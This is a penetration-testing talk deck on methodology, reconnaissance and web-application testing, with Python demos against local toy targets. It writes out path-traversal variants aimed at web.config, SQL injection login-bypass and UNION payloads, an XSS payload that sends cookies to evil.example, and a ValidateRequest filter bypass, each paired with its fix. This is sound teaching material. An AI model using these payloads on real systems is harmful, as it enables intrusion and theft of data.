Improving Application Security
through Penetration Testing
Dominick Baier (dbaier@ernw.de)
Security Consultant / BS 7799 Lead Auditor
ERNW GmbH
Outline
• What is Penetration Testing and Auditing
• Standards and Ethics
• The Process of Testing
• Pen-Testing Web Applications
• The Tools
"Improving the Security of Your Site by
Breaking Into it"
(Dan Farmer/Wietse Venema, 1993)
http://www.fish.com/security/admin-guide-to-cracking.html
Penetration Testing vs. Auditing
• Penetration Testing
- Simulating a motivated attacker for a specific amount of time
- Black Box / White Box Approach
- Is more like a snapshot of the current security of a system or a
business process
• Auditing
- Analyzing
• Configuration Files
• Architecture
• Source Code
- Policy conformance
• Operational Plans and Procedures
Why Penetration Testing
• To measure the security of a system, network or a business
process
- By a third party
• To assess possible risks
• To make upper management "security aware"
Possible Goals of a Penetration Test
• How much information about our network is publicly available?
• Is it possible to compromise this or that system?
• Is it possible to disrupt business process X?
• How effective are our security controls?
- Firewall
- AntiVirus / Spam / Content Filter
- Intrusion Detection Systems
• Is our Information Security Policy correctly enforced?
• Can employees compromise workstation security?
• "Are we safe?"
What can be tested
• Servers and Workstations
- Web Server
- Database Server
- Domain Controller
- Workstations
• Infrastructure
- Network Devices
- Wireless Networks
- Dial-In Access
- VPNs
• Applications
• Employees (Social Engineering)
Attackers to simulate
• Outside Attackers
- Script Kiddies
- Competitors
- Terrorists
- Journalists
• Insiders
- Employees
- Disgruntled Employees
- Contractors
- Consultants
Standards
• Pete Herzog's OSSTMM
"Open Source Security Testing Methodology Manual"
- Very practical approach
- Checklists of what and in which order to test
- List of tools
• ISO 17799 / BS 7799 Standard for Information Security
- Focuses more on the policy and paper work side of security
- Extensive catalog of security controls
- Defines a standard for audits
• NIST Guidelines for Network Security Testing
Ethics
• Findings are under strict NDAs
• No information gathered during the test
- is sent in clear text over the internet
- is used for personal profit
• ISACA Code of Professional Ethics
• (ISC)² Code of Ethics
• Full Disclosure
The STRIDE Threat Model
• STRIDE
- Spoofing Identity
- Tampering with data
- Repudiation
- Information Disclosure
- Denial of Service
- Elevation of Privilege
The Pen-Tester's Mantra
• Segregation of Duties
• Minimal Machine
• Least Privilege
• Patch-Level
• Defense in Depth
• Secure the Weakest Link
• Strong Authentication
Course of Actions
• Opening Meeting
- Goals of the Pen-Test
- Scope
- Responsible Admins
• The Audit / Test itself
• The Report
- Found issues
- Countermeasures
- Prioritization
• Closing Meeting
Stages of a Pen-Test
• Gathering Information
• Analyzing the Infrastructure
• Analyzing the Machines
- Fingerprinting
- Port / Vulnerability-Scanning
- Attacking the System / Proof of Concept
• Analyzing Applications
- Functional / Structural Analysis
- Attacking Authentication and Authorization
- Attacking Data and Back-End Communication
- Attacking Clients
Information Gathering
• In this phase you try to compile as much publicly available
information as possible
- Internic
- IANA / RIPE
- Whois
- Google / Usenet
- Private homepages of employees
- Email Addresses
- Telephone numbers
Information Gathering
• Google Search-Syntax
- allintitle:"Index of /etc"
- site:gov site:mil site:ztarget.com
- filetype:doc filetype:pdf filetype:xls
- intitle:, inurl:, allinurl:
- allinurl:mssql, allinurl:gw …
- inurl:".aspx?ReturnUrl="
- "+www.ernw.+de"
- related:www.ernw.de
- login site:www.microsoft.com
- [cached]
Information Gathering
• Mailing-Lists / Forums / Usenet
- Some vendors even post internal support questions to public
newsgroups
Information Gathering
• Mailing-Lists / Forum / Usenet
Invitation?
Analyzing the Infrastructure and Machines
• A layered model: every host is a stack of Data / Application / Service / OS, and the hosts talk to each other over the Network at the bottom

      Data          Data
      Application   Application
      Service       Service
      OS            OS
      ------ Network ------
Analyzing the Infrastructure and Machines
• The Reality (diagram): Browser -> Web Server -> Application Server -> Database Server, talking over HTTP, DCOM, SOCKETS and CORBA, with Auth, LDAP, Web Content, Audit Logs and the Database / Data behind them
- The clean layers turn into a mesh of components and protocols, each of which has to be analyzed
Analyzing the Infrastructure and Machines
• Querying System and DNS Information
• Portscanning
• Fingerprinting
• Vulnerability Scanning
• Exploiting a Vulnerability
Querying System and DNS Information
• TraceRoute
- Tracing the network route gives you information about
• The provider
• Type of connection
- Simple / Redundant / Load Balanced
- At which hop ICMP gets blocked (i.e. where the first filtering device sits)
Querying System and DNS Information
• DNS Zone Transfer
- DNS servers should be configured to allow zone transfers (AXFR) only to specific peers, i.e. their secondaries
- If the server answers an AXFR from anyone, the zone is very interesting
• Which machines are listed in the zone (host names often give away their role)
• Information about the IP network structure
Portscanning & Fingerprinting
• Port Scanning gives you information about which ports a
machine listens on
• Every open port is potentially vulnerable
• More advanced scanners try to figure out what kind of
software (+ vendor and version) is installed
• Most popular Port Scanners
- SuperScan (www.foundstone.com)
- NMAP (www.insecure.org/nmap)
Banner Grabbing
• Connect with Netcat or Telnet to a service
• You will often get detailed information (product and version) from the greeting banner alone
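The connect scan plus banner grab from the last two slides, as an added example that is not part of the original slides. It starts a throwaway local listener (a constructed Sendmail-style SMTP greeting, not a real host) so the whole thing runs offline, then scans a port list, records which ports accept a TCP connection, reads whatever the service says first, and matches the banner against a small, assumed fingerprint table.

```python
import socket
import threading

# Constructed banner for the local test service (assumption: not a real host).
FAKE_BANNER = b"220 mail.example.test ESMTP Sendmail 8.12.9/8.12.9; ready\r\n"


def start_banner_service(banner=FAKE_BANNER, host="127.0.0.1"):
    """Start a throwaway TCP listener on a free port that greets each client
    with `banner`, the way SMTP/FTP/SSH daemons do. Returns (port, socket)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))            # port 0: let the OS pick a free port
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:         # listener shut down
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1], srv


def stop_service(srv):
    """Shut the listener down (shutdown() wakes the thread blocked in accept())."""
    try:
        srv.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    srv.close()


def grab_banner(host, port, timeout=1.0):
    """TCP-connect to host:port. Returns (is_open, banner_text).
    banner_text is '' when the port is open but the service stays silent
    (HTTP, for instance, waits for the client to talk first)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b""
            return True, data.decode("ascii", errors="replace").strip()
    except OSError:                 # refused, unreachable, timed out
        return False, ""


def scan(host, ports, timeout=1.0):
    """Connect-scan a list of ports; return {port: banner} for open ports only."""
    results = {}
    for port in ports:
        is_open, banner = grab_banner(host, port, timeout)
        if is_open:
            results[port] = banner
    return results


def guess_software(banner):
    """Tiny fingerprint table keyed on banner substrings (assumption: toy list)."""
    fingerprints = {
        "Sendmail": "Sendmail SMTP",
        "Microsoft ESMTP": "Microsoft SMTP service",
        "OpenSSH": "OpenSSH",
        "vsFTPd": "vsftpd",
    }
    for needle, name in fingerprints.items():
        if needle in banner:
            return name
    return "unknown"


if __name__ == "__main__":
    port, srv = start_banner_service()
    # Scan the live port plus a neighbour that is (normally) closed.
    for p, banner in scan("127.0.0.1", [port, port + 1]).items():
        print(f"{p}/tcp open  banner={banner!r}  software={guess_software(banner)}")
    stop_service(srv)
```

Against a real target the same `scan()` call is pointed at the host under test; keep the timeout short, because filtered ports (firewall drops) only show up as timeouts and dominate the runtime.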
Vulnerability Scanner
• Automated scanners that check for known vulnerabilities
- They often give you more information for vulnerability
investigation
• There are vulnerability and exploit databases on the internet
- SecurityFocus (www.securityfocus.com)
- Packet Storm (www.packetstormsecurity.com)
Vulnerability Scanner
• System / Host Scanner
- Nessus (www.nessus.org)
- Retina (www.eeye.com)
- ISS Security Scanner (www.iss.net)
- Microsoft MBSA (www.microsoft.com)
• Database Scanner
- MetaCoreTex (www.metacoretex.com)
- AppSecInc AppDetective (www.appsecinc.com)
- ISS Database Scanner (www.iss.net)
• Web Server Scanner
- Nikto (www.cirt.net)
Vulnerability Investigation
• www.securityfocus.com/bid
Vulnerability Investigation
• www.packetstormsecurity.org
Pen-Testing Web Applications
• Visualize the HTTP Traffic
- Sniffer (e.g. Ethereal)
- Web Proxies
• Achilles (http://packetstormsecurity.nl/web/achilles-0-27.zip)
• Fiddler (www.fiddlertool.com)
• WebProxy (www.atstake.com)
- Hand craft HTTP Requests
• Wfetch & Tinyget (IIS6 Resource Kit)
• Structural Analysis: record every page found in a table, e.g.

Page        Path      Auth?  SSL?  GET/POST  Comment
Index.aspx  /         N      N
login.aspx  /login/   N      Y     POST      Login Page
about.aspx  /about/   N      N               Email Addresses
Structural Analysis
• ...or graphical
Pen-Testing Web Applications
• Try some URLs
- Common Directories
• /html, /images, /jsp, /cgi
- "Hidden" Directories
• /admin, /secure, /adm, /management
- Backup and Log Files
• /.bak, /backup, /back, /log, /logs, /archive, /old
- Include Files
• /include, /inc, /js, /global, /local
- Localized Versions
• /de, /en, /1033
- trace.axd
• Look at the HTTP Status Codes
- Everything besides 404 is interesting: 401/403 prove the resource exists, 3xx tells you where it moved, 200 means it is readable
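The "try some URLs" procedure above as an added example, not code from the original slides. It requests every candidate path from the checklist and keeps everything that does not answer 404. To run offline it brings up its own tiny web server with a constructed site map (an admin area behind Basic auth, a forbidden backup directory, a moved `/old/` and an exposed `trace.axd`); the server, the paths and the status codes are assumptions for the demonstration.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Candidate paths from the checklist on the slide.
CANDIDATES = [
    "/html/", "/images/", "/jsp/", "/cgi/",
    "/admin/", "/secure/", "/adm/", "/management/",
    "/.bak", "/backup/", "/back/", "/log/", "/logs/", "/archive/", "/old/",
    "/include/", "/inc/", "/js/", "/global/", "/local/",
    "/de/", "/en/", "/1033/",
    "/trace.axd",
]

# Constructed target site (assumption): everything not listed here is 404.
FAKE_SITE = {
    "/": 200,
    "/admin/": 401,      # exists, needs credentials
    "/backup/": 403,     # exists, directory listing forbidden
    "/old/": 301,        # moved, Location header leaks the new name
    "/trace.axd": 200,   # ASP.NET trace viewer left enabled
}


class FakeSiteHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        status = FAKE_SITE.get(self.path, 404)
        self.send_response(status)
        if status == 301:
            self.send_header("Location", "/archive/")
        if status == 401:
            self.send_header("WWW-Authenticate", 'Basic realm="admin"')
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):   # keep the console quiet
        pass


def start_fake_site():
    srv = HTTPServer(("127.0.0.1", 0), FakeSiteHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def probe(host, port, paths, timeout=2.0):
    """Request every candidate path; return {path: (status, location)} for
    every response other than 404."""
    hits = {}
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        for path in paths:
            conn.request("GET", path)
            resp = conn.getresponse()
            resp.read()                       # drain so the connection can be reused
            if resp.status != 404:
                hits[path] = (resp.status, resp.getheader("Location"))
    finally:
        conn.close()
    return hits


if __name__ == "__main__":
    srv, port = start_fake_site()
    for path, (status, location) in probe("127.0.0.1", port, CANDIDATES).items():
        print(f"{status} {path}" + (f" -> {location}" if location else ""))
    srv.shutdown()
```

On a real engagement the same `probe()` is pointed at the target with a larger wordlist; note that some sites answer 200 for every path (custom error pages), in which case you have to compare response sizes or content instead of status codes.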
Pen-Testing Web Applications
• Look for
- Cascading Style Sheets (.css)
- XML files / XML Stylesheets (.xml / .xsl)
- JavaScript files (.js)
- Include Files (.inc)
- Text files (.txt)
- Comments
- Client-Side Validation
- Forms
• Hidden Fields
• Password Fields
• MaxLength Attributes
Pen-Testing Web Applications
• "Odd" Query Strings
www.site.com/show.aspx?content=marketing.xml
www.site.com/UserArea/default.php?UserID=5
www.site.com/dbsubmit.php?Title=Mr&Phone=123
www.site.com/menu.asp?sid=73299
• Cookie values
Canonicalization Errors
• Popular Examples
- Apache WebServer
• /scripts and /SCRIPTS
- Microsoft IIS 5
• ../ and .%2e%2f
- ISS Firewall
• action=delete and action=%64elete
- Microsoft IE4
• Dotless IP Bug
- ASP.NET Authorization Canonicalization Bug
• http://localhost/formsec/secure%5csecret.aspx
Resource Names
• Example
http://server/cms/show.aspx?file=content.xml
• Can I use this page to show other files?
http://server/cms/show.aspx?file=../web.config
• Try some variations
http://server/cms/show.aspx?file=../web.config.
http://server/cms/show.aspx?file=../web.config::$DATA
http://server/cms/show.aspx?file=..%5cweb.config
http://server/cms/show.aspx?file=..%255cweb.config
http://server/cms/show.aspx?file=..%%35%63web.config
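The variations above, and the canonicalization errors from the previous slide, come down to the server decoding the name differently from the code that checks it. This added example (not from the original slides) puts the probe list next to a typical broken check (one URL decode, then look for `../`) and a hardened one that decodes until the string stops changing, normalizes separators and NTFS oddities, and then verifies the resolved path stays under the content directory. The base directory `/var/www/cms/content` is an assumption; nothing is read from disk.

```python
import os
import urllib.parse

# Assumption: the CMS serves files from this directory; only paths are computed here.
BASE_DIR = "/var/www/cms/content"

# The probe variants from the slide, plus the harmless original.
VARIANTS = [
    "content.xml",
    "../web.config",
    "../web.config.",          # trailing dot: NTFS ignores it
    "../web.config::$DATA",    # NTFS alternate data stream syntax
    "..%5cweb.config",         # URL-encoded backslash
    "..%255cweb.config",       # double-encoded backslash (%25 -> %)
    "..%%35%63web.config",     # %%35%63 -> %5c after one decode, \ after two
]


def naive_is_safe(param):
    """A typical broken check: one urldecode, then reject '../' and '..\\'."""
    decoded = urllib.parse.unquote(param)
    return "../" not in decoded and "..\\" not in decoded


def full_decode(value, max_rounds=5):
    """Decode until the string stops changing, so %255c and %%35%63 collapse
    to a backslash just as a lenient server or filesystem would treat them."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def canonical_path(param, base_dir=BASE_DIR):
    """Hardened check: fully decode, strip NTFS tricks, normalise separators,
    resolve against base_dir and require the result to stay inside it.
    Returns the canonical absolute path or raises ValueError."""
    decoded = full_decode(param)
    if "\x00" in decoded:
        raise ValueError("null byte")
    decoded = decoded.replace("\\", "/")          # backslash is a separator on Windows
    decoded = decoded.split("::")[0].rstrip(". ")  # drop ::$DATA and trailing dots/spaces
    # An absolute name ("/etc/passwd") replaces base_dir in join() and is caught below.
    resolved = os.path.normpath(os.path.join(base_dir, decoded))
    if os.path.commonpath([base_dir, resolved]) != base_dir:
        raise ValueError(f"path escapes {base_dir}: {resolved}")
    return resolved


def is_safe(param):
    try:
        canonical_path(param)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for v in VARIANTS:
        print(f"{v:28} naive={naive_is_safe(v)!s:5} hardened={is_safe(v)}")
```

The two double-encoded variants pass the naive check, which is exactly why the slide lists them: the filter decodes once, the component behind it decodes again. Comparing the resolved path against the base directory removes the need to enumerate encodings at all.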
Testing for SQL Injection
• Test whether you can inject SQL code through forms
• If the programmer simply concatenates user input into SQL statements, a database compromise is most likely possible
• Try to generate errors
- Insert a ' character
- Does the application behave differently?
- Is maybe even a database error returned?
• You can execute nasty statements through SQL Injection
- UNION (read rows from other tables)
- DROP ...
- xp_cmdshell (operating system commands on SQL Server)
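The three checks from the slide (the stray quote, a tautology that bypasses the login, a UNION that reads another table) run against a concatenated query and against its parameterised replacement, as an added example that is not from the original slides. The schema and rows are constructed in an in-memory SQLite database; the plaintext passwords are part of the toy, not a recommendation.

```python
import sqlite3


def build_db():
    """Constructed in-memory database: a users table and a second table the
    login page was never meant to touch."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('alice', 'hunter2', 'admin'),
            ('bob',   'letmein', 'user');
        CREATE TABLE credit_cards (id INTEGER PRIMARY KEY, owner TEXT, number TEXT);
        INSERT INTO credit_cards (owner, number) VALUES ('alice', '4111111111111111');
    """)
    return db


def login_vulnerable(db, username, password):
    """The anti-pattern from the slide: user input concatenated into the statement."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return db.execute(sql).fetchall()


def login_fixed(db, username, password):
    """Parameterised query: values travel separately from the SQL text, so a
    quote in the input is data, never syntax."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()


def run_injection_checks(login, db):
    """Run the tester's three probes against a login function and record what
    the tester would observe."""
    observations = {}
    # 1. The single quote: does the application behave differently / leak an error?
    try:
        login(db, "alice'", "x")
        observations["quote"] = "no error"
    except sqlite3.OperationalError as e:
        observations["quote"] = f"database error: {e}"
    # 2. Bypass: close the string, comment out the password clause.
    observations["bypass"] = login(db, "alice' --", "wrong")
    # 3. UNION: append rows from a table the page never queries (same column count).
    observations["union"] = login(db, "x' UNION SELECT owner, number FROM credit_cards --", "x")
    return observations


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", run_injection_checks(login_vulnerable, db))
    print("fixed:     ", run_injection_checks(login_fixed, db))
```

The error text from step 1 is what the tester hopes to see in the HTTP response; the fixed version returns an empty result set for all three probes and still logs alice in with her real password.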
Testing for Cross Site Scripting
• Cross Site Scripting lets an attacker inject script code into Web Pages
• This happens when the application directly outputs client input without proper HTML encoding
• Can be hard to find - look in
- Query Strings
- Form Fields
- HTTP Headers
• Enables Cookie Stealing / Harvesting Attacks
• Many developers rely on ASP.NET's ValidateRequest
- It is an input blacklist, not output encoding: try the <%00...> encoding (a NUL byte after the <) to get past it
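An added example, not from the original slides, that pulls attacker input from the three places the slide names (query string, form field, HTTP header), renders it the vulnerable way and the encoded way, and shows why a request filter is no substitute for output encoding. `validate_request_model` is an assumed, simplified model of the ValidateRequest check (reject `<` followed by a letter, `!`, `/` or `?`), not Microsoft's code; the request and payloads are constructed.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed request: attacker data in the query string, a form field and a header.
REQUEST = {
    "url": "http://www.site.example/search.aspx?q=%3Cscript%3Edocument.location%3D"
           "'http://evil.example/?c%3D'%2Bdocument.cookie%3C/script%3E",
    "form": {"name": "<img src=x onerror=alert(document.cookie)>"},
    "headers": {"User-Agent": "Mozilla/4.0 <script>alert(1)</script>"},
}

# %00 on the wire is a NUL byte after URL decoding. There is no closing tag,
# because '</' would trip the filter too.
NUL_BYPASS = "<\x00img src=x onerror=alert(document.cookie)>"


def attacker_inputs(request):
    """Collect every place the slide says to look: query string, form fields, headers."""
    query = parse_qs(urlsplit(request["url"]).query)
    inputs = {f"query:{k}": v[0] for k, v in query.items()}
    inputs.update({f"form:{k}": v for k, v in request["form"].items()})
    inputs.update({f"header:{k}": v for k, v in request["headers"].items()})
    return inputs


def validate_request_model(value):
    """Assumed, simplified model of ValidateRequest: reject input that looks like
    a tag, i.e. '<' followed by a letter, '!', '/' or '?'. Returns True when the
    input is let through. A NUL byte between '<' and the tag name slips past."""
    return re.search(r"<[A-Za-z!/?]", value) is None


def render_vulnerable(value):
    """Reflects the input straight into the page."""
    return "<p>You searched for: " + value + "</p>"


def render_fixed(value):
    """html.escape turns < > & " ' into entities, so input stays text, never markup."""
    return "<p>You searched for: " + html.escape(value, quote=True) + "</p>"


def looks_like_markup(page):
    """Crude detector: any tag left in the rendered fragment other than our own <p>."""
    stripped = page.replace("<p>", "").replace("</p>", "")
    return re.search(r"<[^>]+>", stripped) is not None


def assess(request):
    """For every input location: does the filter block it, does the vulnerable
    page carry live markup, does the encoded page carry live markup?"""
    results = {}
    for where, value in attacker_inputs(request).items():
        results[where] = {
            "filter_blocks": not validate_request_model(value),
            "vulnerable_has_markup": looks_like_markup(render_vulnerable(value)),
            "fixed_has_markup": looks_like_markup(render_fixed(value)),
        }
    return results


if __name__ == "__main__":
    for where, r in assess(REQUEST).items():
        print(where, r)
    print("NUL bypass passes filter:", validate_request_model(NUL_BYPASS))
    print("NUL bypass, encoded output:", render_fixed(NUL_BYPASS))
```

Headers are the location testers forget most often: a User-Agent or Referer that ends up in an admin "recent visitors" page is stored XSS against the administrator, and ValidateRequest never looked at headers anyway.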
Tools
• Automatic Mirroring of Web Sites
- wget (www.gnu.org/directory/wget.html)
- Black Widow (www.softbytelabs.com)
- Teleport Pro (www.tenmax.com)
• Web Scanner
- WebInspect (www.spidynamics.com)
- NStealth (www.nstalker.com)
• ASP.NET Specific Scanners
- ASP.NET Security Analyzer (www.owasp.org)
- ASP.NET Shared Hosting Analyzer (www.owasp.org)
Conclusion
• Pen-Testing is not black magic
• It is a very systematic procedure
• If you follow the 7 golden rules (the Pen-Tester's Mantra), you can eliminate most of the vulnerabilities
• Do regular Pen-Tests or Audits - you can only benefit
- Internal and third party
• Questions?
you can download the slides from www.leastprivilege.com
Links
• OSSTMM
- www.isecom.org
• NIST Draft Guidelines to Network Security Testing
- http://csrc.nist.gov/publications/drafts/security-testing.pdf
• (ISC)² Code of Ethics:
- https://www.isc2.org/cgi/content.cgi?category=12
• ISACA Code of Professional Ethics
- http://www.isaca.org/Template.cfm?Section=Code_of_Ethics1
Links
• Wfetch
- http://download.microsoft.com/download/d/e/5/de5351d6-4463-4cc3-a27c-3e2274263c43/wfetch.exe
• NetCat
- http://www.atstake.com/research/tools/network_utilities/nc11nt.zip